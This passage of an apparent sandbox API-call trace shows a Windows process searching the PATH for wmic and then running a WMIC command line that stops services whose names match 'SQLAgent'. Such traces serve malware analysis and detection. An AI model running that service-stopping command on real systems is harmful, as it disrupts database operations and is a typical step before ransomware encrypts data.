(uMode=0x1) returned 0x1 [0242.771] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.771] SetErrorMode (uMode=0x1) returned 0x1 [0242.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.771] SetErrorMode (uMode=0x1) returned 0x1 [0242.771] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.772] SetErrorMode (uMode=0x1) returned 0x1 [0242.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.772] SetErrorMode (uMode=0x1) returned 0x1 [0242.772] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.772] SetErrorMode (uMode=0x1) returned 0x1 [0242.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.773] SetErrorMode (uMode=0x1) returned 0x1 [0242.773] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.773] SetErrorMode (uMode=0x1) returned 0x1 [0242.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.773] SetErrorMode (uMode=0x1) returned 0x1 [0242.773] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.774] SetErrorMode (uMode=0x1) returned 0x1 [0242.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.774] SetErrorMode (uMode=0x1) returned 0x1 [0242.774] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.775] SetErrorMode (uMode=0x1) returned 0x1 [0242.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.775] SetErrorMode (uMode=0x1) returned 0x1 [0242.775] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.776] SetErrorMode (uMode=0x1) returned 0x1 [0242.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0242.776] SetErrorMode (uMode=0x1) returned 0x1 [0242.776] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.777] SetErrorMode (uMode=0x1) returned 0x1 [0242.777] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.777] SetErrorMode (uMode=0x1) returned 0x1 [0242.777] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.778] SetErrorMode (uMode=0x1) returned 0x1 [0242.778] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.778] SetErrorMode (uMode=0x1) returned 0x1 [0242.778] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.778] SetErrorMode (uMode=0x1) returned 0x1 [0242.779] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.779] SetErrorMode (uMode=0x1) returned 0x1 [0242.779] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.779] SetErrorMode (uMode=0x1) returned 0x1 [0242.779] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.779] SetErrorMode (uMode=0x1) returned 0x1 [0242.780] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.780] SetErrorMode (uMode=0x1) returned 0x1 [0242.780] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.780] SetErrorMode (uMode=0x1) returned 0x1 [0242.780] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.781] SetErrorMode (uMode=0x1) returned 0x1 [0242.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.781] SetErrorMode (uMode=0x1) returned 0x1 [0242.781] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.781] SetErrorMode (uMode=0x1) returned 0x1 [0242.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.782] SetErrorMode (uMode=0x1) returned 0x1 [0242.782] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.782] SetErrorMode (uMode=0x1) returned 0x1 [0242.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.783] SetErrorMode (uMode=0x1) returned 0x1 [0242.783] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.783] SetErrorMode (uMode=0x1) returned 0x1 [0242.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.783] SetErrorMode (uMode=0x1) returned 0x1 [0242.783] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.784] SetErrorMode (uMode=0x1) returned 0x1 [0242.784] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.784] SetErrorMode (uMode=0x1) returned 0x1 [0242.784] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.784] SetErrorMode (uMode=0x1) returned 0x1 [0242.785] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.785] SetErrorMode (uMode=0x1) returned 0x1 [0242.785] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.785] SetErrorMode (uMode=0x1) returned 0x1 [0242.786] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.786] SetErrorMode (uMode=0x1) returned 0x1 [0242.786] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.786] SetErrorMode (uMode=0x1) returned 0x1 [0242.787] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.787] SetErrorMode (uMode=0x1) returned 0x1 [0242.787] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.787] SetErrorMode (uMode=0x1) returned 0x1 [0242.787] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.787] SetErrorMode (uMode=0x1) returned 0x1 [0242.788] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.788] SetErrorMode (uMode=0x1) returned 0x1 [0242.788] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0242.788] SetErrorMode (uMode=0x1) returned 0x1 [0242.788] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.789] SetErrorMode (uMode=0x1) returned 0x1 [0242.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0242.789] SetErrorMode (uMode=0x1) returned 0x1 [0242.789] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.790] SetErrorMode (uMode=0x1) returned 0x1 [0242.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0242.790] SetErrorMode (uMode=0x1) returned 0x1 [0242.790] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.790] SetErrorMode (uMode=0x1) returned 0x1 [0242.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0242.791] SetErrorMode (uMode=0x1) returned 0x1 [0242.791] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.791] SetErrorMode (uMode=0x1) returned 0x1 [0242.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0242.792] SetErrorMode (uMode=0x1) returned 0x1 [0242.792] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0242.792] SetErrorMode (uMode=0x1) returned 0x1 [0242.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9cd940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0242.792] SetErrorMode (uMode=0x1) returned 0x1 [0242.793] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c9cdae0 | out: lpFindFileData=0x1c9cdae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0242.793] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c9cdaf0 | out: lpFindFileData=0x1c9cdaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0242.793] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0242.793] SetErrorMode (uMode=0x1) returned 0x1 [0242.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c9cdc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0242.794] SetErrorMode (uMode=0x1) returned 0x1 [0242.794] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c9cde10 | out: lpFileInformation=0x1c9cde10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0242.794] SetErrorMode (uMode=0x1) returned 0x1 [0242.794] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0242.794] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c9cdff8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9cdff8) returned 0x4550 [0242.797] CoTaskMemFree (pv=0x1b9b1010) [0242.797] GetConsoleWindow () returned 0x5011e [0242.797] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0242.797] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.797] CoTaskMemFree (pv=0x2af7b0) [0242.798] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0242.798] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.798] CoTaskMemFree (pv=0x2af7b0) [0242.798] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice", pNumArgs=0x1c9ce040 | out: pNumArgs=0x1c9ce040) returned 0x1ee760*="" [0242.798] lstrlenW (lpString="path") returned 4 [0242.798] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc7b0 [0242.798] RtlMoveMemory (in: Destination=0x1b9cc7b0, Source=0x1ee7a2, 